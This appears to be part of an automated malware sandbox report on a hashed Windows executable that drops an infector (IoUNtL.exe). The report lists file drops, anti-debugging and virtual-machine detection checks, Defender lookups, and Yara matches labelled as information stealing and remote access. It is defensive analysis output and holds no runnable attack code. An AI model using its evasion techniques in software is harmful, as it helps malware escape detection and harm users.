Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe File created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 799
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Memory allocated: 21D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Memory allocated: 2600000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Memory allocated: 2400000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe API coverage: 9.8 %
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F41718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00F41754h 1_2_00F41718
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00F429E2
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F42B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00F42B8C
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: Amcache.hve.1.dr Binary or memory string: VMware
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.1.dr Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040CE09
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00485044 mov eax, dword ptr fs:[00000030h] 0_2_00485044
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0061092B mov eax, dword ptr fs:[00000030h] 0_2_0061092B
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00610D90 mov eax, dword ptr fs:[00000030h] 0_2_00610D90
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0068EF83 push dword ptr fs:[00000030h] 0_2_0068EF83
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0040ADB0 GetProcessHeap,HeapFree, 0_2_0040ADB0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040CE09
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040E61C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00416F6A
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_004123F1 SetUnhandledExceptionFilter, 0_2_004123F1
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0061E86C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0061E86C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0061D059 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0061D059
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_006271BA __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_006271BA
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00622641 SetUnhandledExceptionFilter, 0_2_00622641
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Memory allocated: page read and write | page guard
Source: SciTE.exe.1.dr Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: GetLocaleInfoA, 0_2_00417A20
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: GetLocaleInfoA, 0_2_00627C70
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00412A15
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F4139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 1_2_00F4139F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.1.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
Source: Amcache.hve.1.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: IoUNtL.exe PID: 2920, type: MEMORYSTR
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe PID: 1220, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: IoUNtL.exe PID: 2920, type: MEMORYSTR
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe PID: 1220, type: MEMORYSTR